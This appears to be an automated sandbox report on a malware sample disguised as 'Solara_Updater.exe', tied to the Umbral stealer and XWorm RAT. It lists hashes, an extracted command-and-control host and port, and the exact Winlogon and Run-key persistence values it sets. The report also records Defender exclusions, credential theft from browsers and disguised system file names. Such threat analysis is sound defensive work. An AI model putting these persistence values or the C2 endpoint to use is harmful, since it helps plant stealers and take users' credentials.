umbral | 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 16:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solara_Updater.exe
Size

1.9MB
MD5

f4cffd7e6cca2b88bba1f19120e9255f
SHA1

28df62794d325206d1f61a400b5c5c682632e371
SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
SHA512

cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
SSDEEP

49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i

Score

10^/10

umbral xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

answer-riverside.gl.at.ply.gg:45691

Attributes

Install_directory
%AppData%
install_file
svhost.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023409-141.dat	family_umbral
behavioral2/memory/4484-149-0x000002095A430000-0x000002095A470000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000d000000023408-131.dat	family_xworm
behavioral2/memory/4680-150-0x0000000000CB0000-0x0000000000CC6000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dllhost.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\", \"C:\\hostNet\\wininit.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\", \"C:\\hostNet\\wininit.exe\", \"C:\\hostNet\\dwm.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\", \"C:\\hostNet\\wininit.exe\", \"C:\\hostNet\\dwm.exe\", \"C:\\Windows\\tracing\\SppExtComObj.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\", \"C:\\hostNet\\wininit.exe\", \"C:\\hostNet\\dwm.exe\", \"C:\\Windows\\tracing\\SppExtComObj.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1312	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3876	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2372	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	880	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4712	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3744	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4540	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3724	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4060	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3420	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4220	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3392	1236	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1184	1236	schtasks.exe	96

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
752	powershell.exe
2488	powershell.exe
2368	powershell.exe
540	powershell.exe
1952	powershell.exe
4616	powershell.exe
1756	powershell.exe
740	powershell.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	sol.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	XClient.exe

Executes dropped EXE 64 IoCs

pid	Process
2748	Loader.exe
3800	sol.exe
2456	Loader.exe
440	sol.exe
3460	Loader.exe
3720	sol.exe
4300	Loader.exe
4600	sol.exe
5008	Loader.exe
1428	sol.exe
4108	Loader.exe
716	sol.exe
4512	Loader.exe
3216	sol.exe
3128	Loader.exe
3316	sol.exe
4560	Loader.exe
4236	sol.exe
2284	Loader.exe
1628	sol.exe
4876	Loader.exe
388	sol.exe
4680	XClient.exe
4484	RustCheat.exe
880	Loader.exe
4592	sol.exe
1544	bridgeblockportComBroker.exe
3128	Loader.exe
4300	sol.exe
2332	bridgeblockportComBroker.exe
1312	bridgeblockportComBroker.exe
2036	Loader.exe
468	sol.exe
4320	Loader.exe
3008	sol.exe
1628	bridgeblockportComBroker.exe
2312	Loader.exe
644	sol.exe
1416	bridgeblockportComBroker.exe
3468	dllhost.exe
2792	Loader.exe
2472	sol.exe
3060	bridgeblockportComBroker.exe
4388	Loader.exe
756	sol.exe
1872	bridgeblockportComBroker.exe
4956	Loader.exe
1144	sol.exe
2748	bridgeblockportComBroker.exe
1268	Loader.exe
2600	sol.exe
2444	bridgeblockportComBroker.exe
4404	XClient.exe
4344	RustCheat.exe
3000	Loader.exe
4024	sol.exe
3252	bridgeblockportComBroker.exe
4112	XClient.exe
1428	RustCheat.exe
556	Loader.exe
4120	sol.exe
3352	XClient.exe
896	RustCheat.exe
3644	bridgeblockportComBroker.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\SetupMetrics\\smss.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\hostNet\\wininit.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\hostNet\\wininit.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\hostNet\\dwm.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\hostNet\\dwm.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\tracing\\SppExtComObj.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\tracing\\SppExtComObj.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe"	XClient.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
107	ip-api.com
120	ip-api.com
26	ip-api.com
47	ipinfo.io
48	ipinfo.io
57	ip-api.com
77	ip-api.com
105	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSCE69E4374B24ADDAA77E06DBDD789F.TMP	csc.exe
File created	\??\c:\Windows\System32\t4pfwd.exe	csc.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\smss.exe	bridgeblockportComBroker.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\69ddcba757bf72	bridgeblockportComBroker.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\tracing\SppExtComObj.exe	bridgeblockportComBroker.exe
File opened for modification	C:\Windows\tracing\SppExtComObj.exe	bridgeblockportComBroker.exe
File created	C:\Windows\tracing\e1ef82546f0b02	bridgeblockportComBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4540	schtasks.exe
4220	schtasks.exe
1312	schtasks.exe
3876	schtasks.exe
2372	schtasks.exe
880	schtasks.exe
4496	schtasks.exe
3744	schtasks.exe
3392	schtasks.exe
1528	schtasks.exe
4236	schtasks.exe
1184	schtasks.exe
4712	schtasks.exe
3708	schtasks.exe
3724	schtasks.exe
4060	schtasks.exe
3108	schtasks.exe
2084	schtasks.exe
3420	schtasks.exe

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4844	wmic.exe
3460	wmic.exe
3548	wmic.exe
2776	wmic.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	bridgeblockportComBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	sol.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
3252	PING.EXE
3552	PING.EXE
4624	PING.EXE
3108	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
1544	bridgeblockportComBroker.exe
